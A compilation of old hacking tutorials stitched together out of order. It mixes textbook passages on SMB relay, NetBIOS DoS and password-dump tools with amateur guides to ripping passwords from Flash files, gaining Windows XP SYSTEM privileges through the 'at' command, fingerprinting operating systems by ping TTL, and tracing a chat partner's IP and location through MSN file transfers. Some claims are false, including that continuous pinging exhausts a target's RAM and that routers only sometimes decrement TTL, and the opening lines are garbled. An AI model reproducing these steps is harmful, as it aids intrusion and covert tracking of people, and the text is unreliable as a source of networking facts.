to do this, the hacker must sniff the NTLM responses from the authentication server and trick
the victim into attempting Windows authentication with the attacker’s computer. A common
technique is to send the victim an e-mail message with an embedded hyperlink to a fraudulent
Hacking Tools
Win32CreateLocalAdminUser is a program that creates a new user with the username and
password
X
and adds the user to the local administrator’s group. This action is part of the
Metasploit Project and can be launched with the Metasploit framework on Windows.
Offline NT Password Resetter is a method of resetting the password to the administrator’s
account when the system isn’t booted to Windows. The most common method is to boot to
a Linux boot CD and then access the NTFS partition, which is no longer protected, and change
the password.
SMB server. When the hyperlink is clicked, the user unwittingly sends their credentials over
the network.


SMB Redirection
Several automated hacking tools can implement SMB redirection:


SMB Relay MITM Attacks and Countermeasures
An SMB relay MITM attack is when the attacker sets up a fraudulent server with a relay
address. When a victim client connects to the fraudulent server, the MITM server intercepts
the call, hashes the password, and passes the connection to the victim server.
Figure 4.1 illustrates an example of such an attack.


Hacking Tools
SMBRelay is an SMB server that captures usernames and password hashes from incoming
SMB traffic. SMBRelay can also perform man-in-the-middle attacks.
SMBRelay2 is similar to SMBRelay but uses NetBIOS names instead of IP addresses to
capture usernames and passwords.
pwdump2 is a program that extracts the password hashes from a SAM file on a Windows system.
The extracted password hashes can then be run through L0phtCrack to break the passwords.
Samdump is another program to extract NTLM hashed passwords from a SAM file.
C2MYAZZ is a spyware program that makes Windows clients send their passwords as clear
text. It displays usernames and their passwords as users attach to server resources.

SMB relay countermeasures include configuring Windows 2000 to use SMB signing, which
causes it to cryptographically sign each block of SMB communications. These settings are
found under Security Policies/Security Options.


NetBIOS DoS Attacks
A NetBIOS Denial of Service (DoS) attack sends a NetBIOS Name Release message to the NetBIOS
Name Service on a target Windows systems and forces the system to place its name in conflict
so that the name can no longer be used. This essentially blocks the client from participating in the
NetBIOS network and creates a network DoS for that system.


Password-Cracking Countermeasures
The strongest passwords possible should be implemented to protect against password cracking.
Systems should enforce 8–12 character alphanumeric passwords. The length of time the same
password should be used is discussed in the next section.
To protect against cracking of the hashing algorithm for passwords stored on the server,
you must take care to physically isolate and protect the server. The systems administrator can
use the SYSKEY utility in Windows to further protect hashes stored on the server hard disk.
The server logs should also be monitored for brute-force attacks on user accounts.
A systems administrator can implement the following security precautions to decrease the
effectiveness of a brute-force password-cracking attempt:
1.
Never leave a default password.
2.
Never use a password that can be found in a dictionary.


Hacking Tools
SMBGrind increases the speed of L0phtCrack sessions on sniffer dumps by removing duplication
and providing a way to target specific users without having to edit the dump files manually.
The SMBDie tool crashes computers running Windows 2000/XP/NT by sending specially
crafted SMB requests.
NBTdeputy can register a NetBIOS computer name on a network and respond to NetBIOS
over TCP/IP (NetBT) name-query requests. It simplifies the use of SMBRelay. The relay can be
referred to by computer name instead of IP address.


Hacking Tools

NBName can disable entire LANs and prevent machines from rejoining them. Nodes on a Net-
BIOS network infected by the tool think that their names are already in use by other machines.
3.
Never use a password related to the host name, domain name, or anything else that can
be found with whois.
4.
Never use a password related to your hobbies, pets, relatives, or date of birth.
5.
Use a word that has more than 21 characters from a dictionary as a password.
This subject is discussed further in the section “Monitoring Event Viewer Logs.”
In the following sections, we’ll look at two measures you can take to strengthen passwords
and prevent password-cracking.



Password Change Interval
Passwords should expire after a certain amount of time so that users are forced to change
their passwords. If the password interval is set too low, then users will forget their current
passwords; as a result, a systems administrator will have to reset users’ passwords frequently.
On the other hand, if passwords are allowed to be used for too long, then security
may be compromised. The recommended password-change interval is every 30 days. In
addition, it’s recommended that users not be allowed to reuse the last three passwords.
You cannot completely block brute-force password attacks if the hacker
switches the proxy server where the source packet is generated. A systems
administrator can only add security features to decrease the likelihood that
brute-force password attacks will be useful.


Monitoring Event Viewer Logs
Administrators should monitor Event Viewer logs to recognize any intrusion attempts either
before they take place or while they’re occurring. Generally, several failed attempts are logged
in the system logs before a successful intrusion or password attack. The security logs are only
as good as the systems administrators who monitor them.
Tools such as VisualLast aid a network administrator in deciphering and analyzing the
security log files. VisualLast provides greater insight into the NT event logs so the administrator
can assess the activity of the network more accurately and efficiently. The program is
designed to allow network administrators to view and report individual users’ logon and
logoff times; these events may be searched according to time frame, which is invaluable to
security analysts who are looking for intrusion details.
The event log located at
c:\\windows\system32\config\Sec.Event.Evt
contains the
trace of an attacker's brute-force attempts.

Ripping Flash Movies for Passwords

Ripping Flash Movies for Passwords Is easy Follow My Tutorial.

How to rip a flash movie from a website.

Go to the website where the flashfile is located.

Open de sourcecode (rightmouse click...select view sourcecode) of the html,asp,php..etc file where the flash movie is played from.

"http://www.website.com" is the site where the flashfile is located.

"/flash/ " is the subdir on that website.

"movie.swf" is the flash file itself.

but ofcourse this is only a example: the website, subdir and moviename wil be diffrent to this one.

Look for something like this: (can be diffrent)

Now the movie it self, it's highlighted in green.

Now the ripping it self.

Open notepad or a webeditor and create a sourcecode like this:

Flash movie

Save the file with: "Save as" and name it "flash.html".

Open it in your webbrowser and rightclick on the link "Flash movie" select "save target as" and save it to your HDD.

Finally: open it in Macromedia Flash v*.* and lookup the password.

Haking "admin" from "user" mode n more

WELCOME TO www.hackingarticles.tk

one stop compilation for Ethical Hacking

Click here for HOME page

really that is possible !

Refer to the other articles on this wiki for the same topic

as windows seems to have fixed this bug..

still u can browse for educational purpose

u know why is it a "user" account because it lacks come service layer than that in "administrator" account

Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.

Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).

The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager

Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:

You can trick the system into running a program, script, or batch file with system level privileges.

One sample

One trick is to use a vulnerability in Windows long filename support.

Try placing an executable named Program.*, in the root directory of the "Windows" drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the "Program Files" directory is a startup app. The call to "Program Files", will be intercepted by Program.*.

Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.

Quote:

In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.

Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.

Getting SYSTEM

I will now walk you through the process of obtaining SYSTEM privileges.

To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).

At the prompt, enter the following command, then press [ENTER]:

Code:

at

If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:

Code:

at 15:25 /interactive “cmd.exe”

Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:

When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:

You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.

At the system command prompt, enter in the following:

Code:

explorer.exe

A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom):

System user name on start menu

explorer.exe running under SYSTEM

What to do now

Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.

ADMINISTRATOR IN WELCOME SCREEN.

When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.

First you must ensure that the Administrator Account is enabled:

1 open Control Panel

2 open Administrative Tools

3 open Local Security Policy

4 expand Local Policies

5 click on Security Options

6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.

1 open Control Panel

2 open User Accounts

3 click Change the way users log on or log off

4 untick Use the Welcome Screen

5 click Apply Options

You will now be able to log on to Windows XP as Administrator in Normal Mode.

EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!

Start the Registry Editor Go to:

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \

Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

Remote operating system detection

Now a days we invite the so called victim to a webpage/blog

and with the help of a free web traker servive get all his details

as in browser/operating system and other details

but still i would like to share the traditional method as well

Detecting OS (operating system) is another most important step towards hacking into a system. We can even say that after tracing the IP of the system it is the most prior thing that should be done to get the root on a system cause without having knowledge about the OS running by the target system you cannot execute any system commands on the target system and thus your mission wont be accomplished. In here I have figure out the basics of detecting OS remotely without having physical access to the system. There are various method of detecting OS like by trace routing the victim’s IP , by pinging the IP , by using telnet and also by using a terminal. But from my research I have concluded that detecting OS through ping or tracerout is the most simplest but effective way of determining the operating system running in the remote computer without having physical access to the system. Since my aim of writing articles is to make things clear for beginners and intermediate so I will explain remote os detecting through ping method which is very easy to understand even for peoples totally new to computers.. yeah yeah.. I know you call them newbies..right ??

REMOTE OS DETECTION USING PING METHOD

What is PING and what is its utility ?

Ping is an MSDOS utility provided for windows version of DOS and for Unix and operating systems having UNIX as the core kernel. It runs in dos box in windows and directly in UNIX platform. In this manual I will give more stress on the MSDOS version of ping.

Ping is an utility used for sending and receiving packets of data to a target system using its IP and thus from the outputs you can figure out many information about the target system.

In remote os detection we are mainly concerned with the TTL values of the received data packets.

Note: When you send or receive a file over the internet it is not send at once. Instead it is broken down at the source system and these broken fragments of data know as data packets are send through the internet and these data packets are gathered together by the target system according to an algorithm constructed by the source system.

For example if I send a picture of size 400 KB to my girl friend (hey girls out there remember I don’t yet have a gf in reality) then what actually happens is that my system breaks the data into data packets, say the file of 400 KB has been broken down into 4 data packets each having a size of 100 KB and having a name. These data packets are assigned a code known as the TTL value of the data packets by my operating system. Then these data packets are gathered and the original file is formed from these data packets at the target system.

Example:

C:\windows>ping/?

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]

[-r count] [-s count] [[-j host-list] | [-k host-list]]

[-w timeout] target_name

Options:

-t Ping the specified host until stopped.

To see statistics and continue - type Control-Break;

-a Resolve addresses to hostnames.

-n count Number of echo requests to send.

-l size Send buffer size.

-f Set Don't Fragment flag in packet.

-i TTL Time To Live.

-v TOS Type Of Service.

-r count Record route for count hops.

-s count Timestamp for count hops.

-j host-list Loose source route along host-list.

-k host-list Strict source route along host-list.

-w timeout Timeout in milliseconds to wait for each reply.

there are various switches available for ping. Above I have given a list of all the switches available in the DOS version of ping. Using the –t switch you can continuously ping a target until it is crashed down. I am sure you are probably wondering how will it crash down the remote system. The answer is quite simple. If you ping the remote system continuously then what happens is that slowly the RAM of the target system is overloaded with these stack data and compels the system to restart or crashes it. You can also use the –l switch to specify the amount of data packet to be send at a time.

But in this article I am not concerned with crashing down a remote system cause its not that easy as it seems to be, there are many other tricks for it and its not possible to crash down a system of present technology just by simple ping. I am concerned with the TTL values of the output that you will get after pinging a system. You can use –n switch with ping to specify the number of echo (ie data packets) to be send to the target system. The default number is 4.

Example:

C:\windows> ping –n 10 127.0.0.1

This command will ping 127.0.0.1 with 10 packets of data and after that will give you an output.

Now I think its time for a real example which I have executed on my system.

C:\windows>ping 127.0.0.1

Pinging 127.0.0.1 with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<1ms ttl="128

Reply from 127.0.0.1: bytes=32 time<1ms ttl="128

Reply from 127.0.0.1: bytes=32 time<1ms ttl="128

Reply from 127.0.0.1: bytes=32 time<1ms ttl="128

(or check http://members.cox.net/~ndav1/self_published/TTL_values.html)

Ping statistics for 127.0.0.1:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

Here I have pinged the IP 127.0.0.1 (offline ip of any system) with default ping. Here I am getting TTL value as 128. This is the thing what we need for remote os detection.

What is TTL value ?

TTL value is nothing but a simple code assigned to the out going data packets by the operating system of a computer. The TTL value assigned to the out going data packets depends on the operating system and it is the same for a particular operating system. As for example if you ping a system running windows 98 or earlier versions of windows NT with service packs (I don’t know exactly about the TTL values of recent versions of Windows NT but from my research I think it’s the same as previous versions cause the TTL value even in Windows XP is 128) you will get the TTL value as 128, thus from this TTL value you can easily say that the target system is running Microsoft Windows.

TTL values of commonly used Operating Systems

OS VERSION PLATFORM TTL

Windows 9x/NT Intel 32

Windows 9x/NT Intel 128

Windows 2000 Intel 128

DigitalUnix 4.0 Alpha 60

Unisys x Mainframe 64

Linux 2.2.x Intel 64

FTX(UNIX) 3.3 STRATUS 64

SCO R5 Compaq 64

Netware 4.11 Intel 128

AIX 4.3.x IBM/RS6000 60

AIX 4.2.x IBM/RS6000 60

Cisco 11.2 7507 60

Cisco 12.0 2514 255

IRIX 6.x SGI 60

FreeBSD 3.x Intel 64

OpenBSD 2.x Intel 64

Solaris 8 Intel/Sparc 64

Solaris 2.x Intel/Sparc 255

Well these are not all. There are many more TTL values of many other operating systems. But generally most systems lies within this list.

Now lets try this manual practically and find out the operating system running by the IP 202.178.64.19.

C:\windows>ping 202.178.64.19

Pinging 202.178.64.19 with 32 bytes of data:

Reply from 202.178.64.19: bytes=32 time<1ms ttl="128

Reply from 202.178.64.19: bytes=32 time<1ms ttl="128

Reply from 202.178.64.19: bytes=32 time<1ms ttl="128

Reply from 202.178.64.19: bytes=32 time<1ms ttl="128

Ping statistics for 202.178.64.19:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

Well from the output you can figure out many informations. First 4 packets of data each of 32 bytes has been send to 202.178.64.19. In response the target system has responded with data packets of TTL value as 128.

Now we can easily say that the system 202.178.64.19 is running windows.

ERROR CORRECTION IN SOME CASES

There is a possibility of error in TTL values that you receive. Even though the source system send a TTL value of 128 you may receive the TTL value as 120. Well nothing to worry cause its due to the fact that routers reduce the TTL value by 1.

Don’t worry I’ll explain and made things much clearer for you.

It’s a fact that some times routers may reduce the TTL value assigned to the data packets by the source OS by 1.

In that case you have to find out how many routers are there in between your system and the target system and then simply add the number of routers to the received TTL values and you will get the original TTL value.

To find out how many routers there are in between your system and the target system just perform a normal and simple tracert to that IP.

For more information about tracing an IP read my article ‘TRACING IP” in

After tracing the IP using tracert tool of dos suppose you find that there are 10 routers between you and the target system then just simply add 10 to the TTL value that you have received and you will get the original TTL value.

And once you get the original TTL value then its as simple as changing girl friend to find out the operating system running by the remote computer. Just match the TTL value with the above chart and you will find out the operating system info.

How to trace an IP of remote system (web+messenger)

Introduction::

Welcome to another rahulhackingarticles tutorial.

In here I have figure out some very easy but cool ways to trace out the geographical location and various other infos like ISP details etc of a remote computer using its IP.

Well I guess its one of the most important must learn manul for boys out there if you want to impress your friends particularly gals whom you’ll meet online in a chat room and tell them their geographical locations and ISP details and make them surprised and impressed J.

In the practical execution of this manual you don’t have to work much as it is very simple only you have to use your brain to understand some symbols and some format of expressions and use your IQ to execute things the right way.

What is IP and how to get the IP of a remote system::

Getting the IP or Internet Protocol of a remote system is the most important and the first step of hacking into it. Probably it is the first thing a hacker do to get info for researching on a system. Well IP is a unique number assigned to each computer on a network. It is this unique address which represents the system on the network. Generally the IP of a particular system changes each time you log on to the network by dialing to your ISP and it is assigned to you by your ISP. IP of a system which is always on the network remains generally the same. Generally those kind of systems are most likely to suffer a hacking attack because of its stable IP. Using IP you can even execute system commands on the victim’s computer.

Lets take the example of the following IP address: 202.144.49.110 Now the first part, the numbers before the first decimal i.e. 209 is the Network number or the Network Prefix.. This means that it identifies the number of the network in which the host is. The second part i.e. 144 is the Host Number that is it identifies the number of the host within the Network. This means that in the same Network, the network number is same. In order to provide flexibility in the size of the Network, here are different classes of IP addresses:

Address Class Dotted Decimal Notation Ranges

Class A ( /8 Prefixes) 1.xxx.xxx.xxx through 126.xxx.xxx.xxx

Class B ( /16 Prefixes) 128.0.xxx.xxx through 191.255.xxx.xxx

Class C ( /24 Prefixes) 192.0.0.xxx through 223.255.255.xxx

The various classes will be clearer after reading the next few lines.

Each Class A Network Address contains a 8 bit Network Prefix followed by a 24-bit host number. They are considered to be primitive. They are referred to as "/8''s" or just "8's" as they have an 8-bit Network prefix.

In a Class B Network Address there is a 16 bit Network Prefix followed by a 16-bit Host number. It is referred to as "16's".

A class C Network address contains a 24-bit Network Prefix and a 8 bit Host number. It is referred to as

"24's" and is commonly used by most ISP's.

Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where sub-netting came in.

Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when sub-netting comes in then the IP Addresses structure becomes:

xxx.xxx.zzz.yyy

where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain the same and only the last part i.e. yyy is variable.

***********************

For Example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP, whose first three fields are 203.98.12. Get it?

So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words, all subscribers or all people connected to the internet using the same ISP, will have to be in this range. This in effect would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.

This means that if you have done a lot of (By this I really mean a lot) of research, then you could figure out which ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the country of the person. Right? Let me take an example to stress as to how cumbersome but easy (once the research is done) the above method can be.

In my country, say there are three main ISP’s:

ISP Name Network Address Allotted

ISP I 203.94.47.xx

ISP II 202.92.12.xx

ISP III 203.91.35.xx

Now, if I get to know the IP of an e-pal of mine, and it reads: 203.91.35.12, then I can pretty easily figure out that he uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no. You see, the above method of finding out the ISP of a person was successful only because we already had the ISP and Network Address Allotted list with us. So, what my point is, that the above method can be successful only after a lot of research and experimentation. And, I do think such research can be helpful sometimes.

Also, this would not work, if you take it all on in larger scale. What if the IP that you have belongs to someone living in a remote igloo in the North Pole? You could not possibly get the Network Addresses of all the ISP’s in the world, could you? If yes please send it to me J.

Well now I guess you have pretty good knowledge about what an IP is and what you can do by knowing the IP of a remote system. Now lets come to the point of finding out the IP of remote system.

Well you can easily figure out the IP of a remote system using the netstat utility available in the microsoft’s version of DOS. The netstat command shows the connections in which your system is engaged to and the ports they are using. Suppose you are checking your mail in hotmail and you want to find out the IP of msn. All you need to do is to open a dos window (command.com) and type netstat. You will see all the open connections of your system. There you will see something :

Proto Local Address Foreign Address State

TCP rahul:1031 64.4.xx.xx:80 ESTABLISHED

Now you got the IP address of hotmail ass 64.4.xx.xx .

Similarly you can figure out the IP address of most http or ftp connections.

To know your own IP type the following command in a dos windows

C:\netstat –n

[this commands converts the IP name into IP addresses]

this is what you will probably see on typing the above command :

Proto Local Address Foreign Address State

TCP 203.xx.251.161:1031 194.1.129.227:21 ESTABLISHED

TCP 203.xx.251.161:1043 207.138.41.181:80 FIN_WAIT_2

TCP 203.xx.251.161:1053 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1058 194.1.129.227:20 TIME_WAIT

TCP 203.xx.251.161:1069 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1071 194.98.93.244:80 ESTABLISHED

TCP 203.xx.251.161:1078 203.94.243.71:110 TIME_WAIT

Here 203.xx.251.161 is your IP address.

Now lets clarify the format used by netstat :

Proto : It shows the type of protocol the connection with the remote system is using.

Here TCP (transmission control protocol) is the protocol used by my system to connect to other systems.

Local Address : It shows the local address ie the local IP. When the netstat command is executed without –n switch then the name of the local system is displayed and when the netstat is executed with –n switch then the IP of the local system is displayed. Here you can also find out the port used by the connection.

xxx.yyy.zzz.aaa:1024

in this format you will see the local address. Here 1024 is the port to which the remote system is connected in your system

Foreign Address :: It shows the IP address of the remote system to which your system is connected. In this case also if the netstat command is excuted with –n switch then you directly get the IP of the victim but if the netstat is executed without –n switch then you will get the address of the remote system. Something like

C:\netstat

Proto Local Address Foreign Address State

TCP rahul:1031 msgr.lw4.gs681.hotmail.com:80 ESTABLISHED

Here msgr.lw4.gs681.hotmail.com is the address of the foreign system . putting this address in any IP lookup program and doing a whois lookup will reveal the IP of the remote system.

Note: The port to which your system is connected can be found from this in the same way as I have shown in the case of local address. The difference is that, this is the port of the remote system to which your computer is connected to.

Below I have produced a list of ports and popular services generally found to be running.

21 :: FTP port

80 :: http port

23 :: Telnet port

Note: If your execute the netstat command and find ports like 12345,27374 are open and are in use then make it sure that your sweat heart computer is infected with her boyfriend.. J J J J I mean your computer is infected with some sort of Trojan.

Below I have produced a list of commonly known Trojans and the ports they use by default. So if you find these ports open then get a good virus buster and get these stupid servers of the Trojans kicked out. Well if you want to play with these Trojan by keeping them in your computer but not letting them ruin your system performance then just disble it from the system registry run and they wont be loaded to memory each time when windows starts up[This trick doesn’t work for all Trojans].

Netbus :: 12345(TCP)

Subseven :: 27374(TCP)

Girl Friend :: 21554(TCP)

Back Oriface :: 31337 (UDP)

Well guys and gals I hope you are now well familiar with the term IP and what is the utility of IP in cyber world and how to get the IP of a remote system to which you are connected. I hope you find my writings very easy to undertstand. I know I lack the capacity of explaining myself but I try my level best to make things very easy and clear for you’ll.

How to get the IP of a remote system while chatting through msn messenger ::

This is a tutorial on how to get IP address from MSN messenger. This is actually

a really easy thing to do. It is not like going through the hard time and reversing

MSN messenger like many people think.

The IP address is only given when you accept or are sending a file through MSN

messenger. When you send IM's, the message is sent through the server thus hiding

your victims IP and your. But when you send a file or recieve a file, it is direct

connection between the two computers.

To obtain the IP accept a file transfer or send a file to the victim, when the file

sending is under way from the dos prompt type "netstat" without the quotation marks.

You should get a table like this:

Proto Local Address Foreign Address State

TCP kick:1033 msgr-ns29.msgr.hotmail.com:1863 ESTABLISHED

TCP kick:1040 msgr-sb36.msgr.hotmail.com:1863 ESTABLISHED

TCP kick: ESTABLISHED

The top name in the list is the server's address for IMing. There could be many of

the second name in the list, as a new connection is made to the server for every

room you are IMing to. You are looking for the address of the remote host in

this table it may be something similar to "host63-7-102-226.ppp.cal.vsnl.com" or “203..64.90.6”.

without the quotation marks.

All you need to do now is to put this address in you IP lookup programe and get the IP of the remote system.

Well 50%of the work is done now. Now you know how to get the IP of a remote system, so its time to trace it down and find some details about the IP.

Tracing an IP is quite simple. You can do it the easy way by using some sweet softwares like Visual Trace 6.0b

[ftp://ftp.visualware.com/pub/vr/vr.exe]

Neotrace

[http://www.neoworx.com/download/NTX325.exe]

or by our way ie. Using MS DOS or any other version of DOS.

Well I suggest you to use DOS and its tracert tool for tracing the IP cause using it will give you a clear conception about the art of tracing an IP and I guarantee that you will feel much satisfied on success than using a silly software. Furthur you will know how things work and how the IP is traced down and the different networks associated in this tracing process.

Let us take a look at tracert tool provided for DOS by Microsoft.

It is a very handy tool for peoples need to trace down an IP.

Just open any DOS windows and type tracert.

C:\windows>tracert

Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

Options:

-d Do not resolve addresses to hostnames.

-h maximum_hops Maximum number of hops to search for target.

-j host-list Loose source route along host-list.

-w timeout Wait timeout milliseconds for each reply.

You will now see a description of the tracert command and the switches associated with it.

Well these switches doesn’t makes much difference. All you can do is to increase the timeout in milliseconds by using –w switch if you are using a slow connection and the –d switch if you wish not resolve address to hostnames by default.

By default tracert performs a maximum of 30 hops trace. Using the –h switch you can specify the number of hops to perform.

Now its time for execution.

Let us trace down the IP yahoo.com [216.115.108.243]

TIP: If you have done a long research (I mean a lot) then simply looking at the IP you can figure out some info from it. For example the IP 203.90.68.8 indicates that the system is in India. In India IPs generally begin with 203 and 202

C:\WINDOWS>tracert yahoo.com

Tracing route to yahoo.com [216.115.108.243] over a maximum of 30 hops:

1 308 ms 142 ms 127 ms 203.94.246.35

2 140 ms 135 ms * 203.94.246.1

3 213 ms 134 ms 132 ms 203.94.255.33

4 134 ms 130 ms 129 ms 203.200.64.29

5 122 ms 135 ms 131 ms 203.200.87.75

6 141 ms 137 ms 121 ms 203.200.87.15

7 143 ms 170 ms 154 ms vsb-delhi-stm1.Bbone.vsnl.net.in [202.54.2.241]

8 565 ms 589 ms 568 ms if-7-0.bb8.NewYork.Teleglobe.net [207.45.198.65]

9 596 ms 584 ms 600 ms if-3-0.core2.NewYork.teleglobe.net [207.45.221.66]

10 * * * Request timed out.

11 703 ms 701 ms 719 ms if-3-0.core2.PaloAlto.Teleglobe.net [64.86.83.205]

12 694 ms 683 ms 681 ms if-6-1.core1.PaloAlto.Teleglobe.net [207.45.202.33]

13 656 ms 677 ms 700 ms ix-5-0.core1.PaloAlto.Teleglobe.net [207.45.196.90]

14 667 ms 673 ms 673 ms ge-1-3-0.msr1.pao.yahoo.com [216.115.100.150]

15 653 ms 673 ms 673 ms vl20.bas1.snv.yahoo.com [216.115.100.225]

16 666 ms 676 ms 674 ms yahoo.com [216.115.108.243]

Trace complete.

Note: Here I have traced yahoo.com. In place of yahoo.com you can give the IP of yahoo or any other IP you want to trace, the result will be the same.

Now carefully looking at the results you can figure out many information about yahoo’s server [216.115.108.243]

First packets of data leave my ISP which is at 203.94.246.35 .Similarly you can find out the different routers through which the packets of data are send and received to and from the target system. Now take a look at the 13th line you’ll see that the router is in PaloAlto.Teleglobe.net from this you can easily figure out that the router is in Palo Alto. Now finally look at the target system ie. Yahoo’s server vl20.bas1.snv.yahoo.com . Now you got the address of yahoo’s server. Now put this address in any IP lookup programe and perform and reverse DNS lookup and you will get most of the info about this address,like the place where it is in.

Well another thing you can find out using the tracert tool is that the number of hops (routers) the target system is away from you. In case of tracerouting yahoo.com we find that the target system ie yahoo’s server is 16 hops away from my system. This indicates that there are 16 routers between my system and yahoo’s server.

Apart from tracing an IP you can find out many usefull details about the target system using the tracert tool.

Firewall Detection

While tracerouting a target system, if you get * as an output then it indicates timeout error. Now if you peform another tracerout to the same taeget system at some other time with a good connection and in this way few times more and if you always get * as the output then take it for sure that the target system is running a firewall which prevents sending of data packets from the target system.

Example

Some days ago I tried to tracert hotmail’s server in plain and simple way using tracert without any trick.This is what I found out :

c:\windows>tracert 64.4.53.7

Tracing route to lc2.law5.hotmail.com [64.4.53.7]

over a maximum of 30 hops:

1 * * * Request timed out.

2 161 ms 147 ms 85 ms 203.90.69.81

3 126 ms 261 ms 219 ms 203.90.66.9

4 121 ms 115 ms 228 ms delswp2.hclinfinet.com [203.90.66.133]

5 727 ms 725 ms 711 ms 203-195-147-250.now-india.net.in [203.195.147.250]

6 1006 ms 794 ms 952 ms core-fae-0-0.now-india.net.in [203.195.147.3]

7 826 ms 731 ms 819 ms 213.232.106.9

8 885 ms 744 ms 930 ms 213.166.3.209

9 851 ms 1020 ms 1080 ms 213.232.64.54

10 1448 ms 765 ms 1114 ms pos8-0.core2.London1.Level3.net [212.113.0.118]

11 748 ms 789 ms 750 ms ge-4-2-1.mp2.London1.Level3.net [212.187.131.146]

12 719 ms 733 ms 846 ms so-3-0-0.mp1.London2.Level3.net [212.187.128.46]

13 775 ms 890 ms 829 ms so-1-0-0.mp2.Weehawken1.Level3.net [212.187.128.138]

14 853 ms 852 ms 823 ms so-3-0-0.mp1.SanJose1.Level3.net [64.159.1.129]

15 889 ms 816 ms 803 ms so-7-0-0.gar1.SanJose1.Level3.net [64.159.1.74]

16 * * * Request timed out.

17 * * * Request timed out.

18 * * * Request timed out.

19 * * * Request timed out.

20 * * * Request timed out.

21 * * * Request timed out.

22 * * * Request timed out.

23 * * * Request timed out.

24 * * * Request timed out.

25 * * * Request timed out.

26 * * * Request timed out.

27 * * * Request timed out.

28 * * * Request timed out.

29 * * * Request timed out.

30 * * * Request timed out.

Trace complete.

I performed the same tracert many times a day but concluded with the same result. This indicates that the systems after the router SanJose1.Level3.net has firewalls installed which prevents the outgoing of data packets.

Detecting Traceroute Attempts on your System

You can detect that an attacker is performing a traceroute on your system, if you see the following symptoms:

1. If you observe port scans on very high UDP ports. This symptom means that the attacker has performed a traceroute on your system. However, it could also mean a simply port scan. Either way, it signifies the fact that your system is being scanned.

2. If the packet-monitoring tool installed in your network, picks up several outgoing TTL-exceeding messages, then it is yet another sign that someone is doing a traceroute on your system.

